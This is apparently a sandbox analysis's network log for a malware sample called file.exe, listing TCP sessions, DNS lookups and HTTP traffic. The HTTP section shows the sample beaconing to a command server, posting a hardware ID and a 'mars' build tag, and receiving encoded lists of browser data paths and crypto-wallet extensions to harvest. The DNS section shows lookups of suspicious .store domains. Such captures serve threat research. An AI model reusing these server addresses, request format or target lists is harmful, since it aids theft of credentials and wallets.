Nov 11, 2024 01:14:59.582215071 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.582273960 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.582300901 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.582320929 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.582334042 CET	49786	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.582338095 CET	443	49786	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.583169937 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.583534956 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.583549976 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.584006071 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.584009886 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.584285975 CET	49792	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.584299088 CET	443	49792	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.584361076 CET	49792	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.584484100 CET	49792	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.584496975 CET	443	49792	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.591106892 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.591497898 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.591505051 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.591922045 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.591924906 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.711668015 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.711891890 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.711971998 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.712064981 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.712073088 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.712088108 CET	49788	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.712093115 CET	443	49788	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.715190887 CET	49793	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.715233088 CET	443	49793	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.715308905 CET	49793	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.715464115 CET	49793	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.715475082 CET	443	49793	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.721313000 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.721512079 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.721573114 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.726345062 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.726351976 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.726387978 CET	49789	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.726392984 CET	443	49789	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.729497910 CET	49794	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.729533911 CET	443	49794	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:59.729609966 CET	49794	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.729743958 CET	49794	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:59.729763031 CET	443	49794	13.107.246.45	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 01:14:04.702438116 CET	192.168.2.4	1.1.1.1	0xf57d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:14:04.702579021 CET	192.168.2.4	1.1.1.1	0xdf19	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 11, 2024 01:14:07.919008017 CET	192.168.2.4	1.1.1.1	0xcc2e	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:14:07.919189930 CET	192.168.2.4	1.1.1.1	0xafd5	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 11, 2024 01:14:08.927067041 CET	192.168.2.4	1.1.1.1	0xe95c	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:14:08.927289963 CET	192.168.2.4	1.1.1.1	0xcf6b	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 11, 2024 01:15:08.942471027 CET	192.168.2.4	1.1.1.1	0x86db	Standard query (0)	mncrafter.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 01:14:04.709100008 CET	1.1.1.1	192.168.2.4	0xdf19	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 11, 2024 01:14:04.709121943 CET	1.1.1.1	192.168.2.4	0xf57d	No error (0)	www.google.com		172.217.16.196	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:14:07.925802946 CET	1.1.1.1	192.168.2.4	0xcc2e	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 01:14:07.925802946 CET	1.1.1.1	192.168.2.4	0xcc2e	No error (0)	plus.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:14:07.925961018 CET	1.1.1.1	192.168.2.4	0xafd5	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 01:14:08.937417984 CET	1.1.1.1	192.168.2.4	0xe95c	No error (0)	play.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:09.129369974 CET	1.1.1.1	192.168.2.4	0x86db	No error (0)	mncrafter.ru		87.236.16.19	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.813342094 CET	1.1.1.1	192.168.2.4	0x733c	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.840040922 CET	1.1.1.1	192.168.2.4	0x2bfe	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.863318920 CET	1.1.1.1	192.168.2.4	0x3d2b	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.886487007 CET	1.1.1.1	192.168.2.4	0xb3e7	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.911119938 CET	1.1.1.1	192.168.2.4	0x1193	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:38.935412884 CET	1.1.1.1	192.168.2.4	0x5dae	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.422530890 CET	1.1.1.1	192.168.2.4	0x26ae	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.447798014 CET	1.1.1.1	192.168.2.4	0xb0f4	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.471211910 CET	1.1.1.1	192.168.2.4	0x4105	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.516262054 CET	1.1.1.1	192.168.2.4	0xf5c6	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.539963007 CET	1.1.1.1	192.168.2.4	0x727e	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:15:51.565212011 CET	1.1.1.1	192.168.2.4	0x5ce0	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.166172981 CET	1.1.1.1	192.168.2.4	0x79	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.203082085 CET	1.1.1.1	192.168.2.4	0x927a	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.340928078 CET	1.1.1.1	192.168.2.4	0x3108	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.410600901 CET	1.1.1.1	192.168.2.4	0x54e3	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.445627928 CET	1.1.1.1	192.168.2.4	0x476f	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 01:16:00.470963955 CET	1.1.1.1	192.168.2.4	0x2d22	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	7312	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:13:58.872155905 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:13:59.778992891 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:13:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:13:59.781533003 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="build"mars------EBGIEGCFHCFHIDHIJECA--
Nov 11, 2024 01:14:00.073045969 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:13:59 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 44 68 6d 4f 54 59 33 4f 47 55 79 5a 6a 64 6d 5a 44 6b 77 59 57 5a 6c 4d 6d 45 78 4d 7a 45 35 4e 54 49 33 4f 57 4d 78 59 57 4d 33 59 6a 68 69 59 6a 64 68 4e 7a 45 33 4d 44 55 32 5a 54 42 6d 4e 47 4a 68 4e 6d 4e 6d 4d 6a 5a 6c 4f 47 45 77 4e 44 46 6c 4d 44 55 79 4d 54 6b 79 59 6a 67 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZDhmOTY3OGUyZjdmZDkwYWZlMmExMzE5NTI3OWMxYWM3YjhiYjdhNzE3MDU2ZTBmNGJhNmNmMjZlOGEwNDFlMDUyMTkyYjgwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 11, 2024 01:14:00.074481010 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAF Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="message"browsers------EGIDHDGCBFBKECBFHCAF--
Nov 11, 2024 01:14:00.356173992 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 11, 2024 01:14:00.356188059 CET	212	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIg
Nov 11, 2024 01:14:00.356201887 CET	808	IN	Data Raw: 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 Data Ascii: RGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHBsaWNhdGlvblx8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8MHxRUUJ
Nov 11, 2024 01:14:00.357508898 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="message"plugins------JDGCFBAFBFHJEBGCAEGH--
Nov 11, 2024 01:14:00.639755011 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 11, 2024 01:14:00.639770985 CET	112	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
Nov 11, 2024 01:14:00.639784098 CET	1236	IN	Data Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
Nov 11, 2024 01:14:00.639795065 CET	212	IN	Data Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8
Nov 11, 2024 01:14:00.639807940 CET	1236	IN	Data Raw: 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 Data Ascii: VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3w
